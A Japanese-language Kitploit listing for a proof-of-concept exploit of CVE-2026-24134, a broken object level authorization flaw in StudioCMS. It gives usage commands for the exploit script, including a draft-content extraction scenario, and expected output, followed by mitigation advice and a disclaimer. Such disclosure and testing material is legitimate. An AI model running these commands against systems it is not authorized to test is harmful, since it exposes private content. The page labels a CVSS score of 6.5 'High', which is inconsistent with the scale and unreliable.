Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-24134-PoC — # CVE-2026-24134 の概念実証エクスプロイト StudioCMS における Broken Object Level Authorization(オブジェクトレベル認可の欠陥)脆弱性を実証し、下書きコンテンツへの不正アクセスを示します。 | Kitploit
ツール/GitHubGitHub/filipegaudard/cve-2026-24134-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用APIセキュリティテストペネトレーションテスト学習と教育
GitHubfilipegaudard/cve-2026-24134-poc

CVE-2026-24134-PoC

# CVE-2026-24134 の概念実証エクスプロイト StudioCMS における Broken Object Level Authorization(オブジェクトレベル認可の欠陥)脆弱性を実証し、下書きコンテンツへの不正アクセスを示します。

リポジトリを見る
6ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-24134-PoC

概要

このリポジトリには、StudioCMS における CVE-2026-24134(オブジェクトレベル認可の欠陥(BOLA))の概念実証(PoC)が含まれています。

内容

  • cve_2026_24134_poc.py - Python エクスプロイトスクリプト

前提条件

  • StudioCMS<=0.1.1
root@kitploit:~
pip install requests colorama

クイックスタート

手動エクスプロイト

root@kitploit:~
# 基本的な使用方法
python3 cve_2026_24134_poc.py \
  -u http://localhost:4321 \
  --username visitor_user \
  --password visitor_pass \
  --uuid bad87630-69a4-4cd6-bcb2-6965839dc148

# 出力をファイルに保存
python3 cve_2026_24134_poc.py \
  -u http://localhost:4321 \
  --username visitor_user \
  --password visitor_pass \
  --uuid bad87630-69a4-4cd6-bcb2-6965839dc148 \
  --save

自動テスト

root@kitploit:~
python3 cve_2026_24134_poc.py \
  -u http://localhost:4321 \
  --auto-test \
  --visitor-user visitor01 \
  --visitor-pass visitorpass \
  --editor-user editor01 \
  --editor-pass editorpass \
  --uuid bad87630-69a4-4cd6-bcb2-6965839dc148

引数

必須

  • -u, --url - 対象の StudioCMS ベース URL
  • --uuid - 対象の下書きコンテンツ UUID

手動モード

  • --username - 認証用のユーザー名
  • --password - 認証用のパスワード

自動テストモード

  • --auto-test - 自動テストを有効化
  • --visitor-user - ビジターアカウントのユーザー名
  • --visitor-pass - ビジターアカウントのパスワード
  • --editor-user - エディターアカウントのユーザー名
  • --editor-pass - エディターアカウントのパスワード

オプション

  • --save - レスポンス内容をファイルに保存
  • --no-ssl-verify - SSL 証明書の検証を無効化

シナリオ例

シナリオ 1: システムが脆弱かどうかをテスト

root@kitploit:~
python3 cve_2026_24134_poc.py \
  --url http://target.com \
  --auto-test \
  --visitor-user test_visitor \
  --visitor-pass SecurePass123! \
  --editor-user test_editor \
  --editor-pass SecurePass456! \
  --uuid 12345678-1234-1234-1234-123456789abc

脆弱な場合の期待される出力:

root@kitploit:~
[+] Successfully authenticated as test_visitor
[*] Detected user role: Visitor
[+] Successfully accessed draft content!
[!] VULNERABILITY CONFIRMED!

パッチ適用済みの場合の期待される出力:

root@kitploit:~
[+] Successfully authenticated as test_visitor
[*] Detected user role: Visitor
[*] Access denied (403 Forbidden)
[+] VULNERABILITY NOT PRESENT

シナリオ 2: 下書きコンテンツの抽出

root@kitploit:~
python3 cve_2026_24134_poc.py \
  --url http://localhost:4321 \
  --username attacker \
  --password pass123 \
  --uuid target-uuid-here \
  --save

これにより、完全な下書きコンテンツが draft_{uuid}.html に保存されます。

出力の解釈

成功インジケーター

  • [+] - 操作成功(緑)
  • [*] - 情報メッセージ(青)
  • [!] - 警告(黄)
  • [-] - エラー(赤)

HTTP ステータスコード

  • 200 OK - 脆弱!下書きコンテンツにアクセス可能
  • 403 Forbidden - パッチ適用済み!適切な認可が実装されている
  • 404 Not Found - UUID が無効、またはセキュアな実装(存在を隠すために 404 を返す)
  • 401 Unauthorized - 認証に失敗

緩和策

脆弱なバージョンの StudioCMS を実行している場合は、直ちにパッチ適用済みのバージョンに更新してください。

開発者向け

根本的な問題: 認可チェックがサーバー側ではなくクライアント側(JavaScript)で実行されていました。

開発チームによると:

"Currently the rank level check to redirect is being done in client JS, which was supposed to be replaced shortly there after."

修正方法: 認可をクライアントからサーバーへ移行します。

重要な原則: クライアントを決して信頼しないこと。クライアント側のセキュリティ = UX の強化。サーバー側のセキュリティ = 実際の保護。

法的免責事項

重要: このツールは、教育目的および許可されたセキュリティテスト専用に提供されています。

  • 所有しているシステム、または明示的な書面による許可を得たシステムに対してのみ使用してください
  • コンピューターシステムへの不正アクセスは、ほとんどの法域で違法です
  • 著者は、このツールの誤用について一切の責任を負いません
  • 常に責任ある開示の慣行に従ってください

参考情報

  • CVE: CVE-2026-24134
  • CVSS: 6.5 High
  • CWE: CWE-639
  • OWASP: API1:2023 - Broken Object Level Authorization

連絡先

この PoC または脆弱性に関する質問については:

  • 著者: Filipe Gaudard

ライセンス

この PoC は教育目的で公開されています。責任を持って倫理的に使用してください。

ツールをダウンロード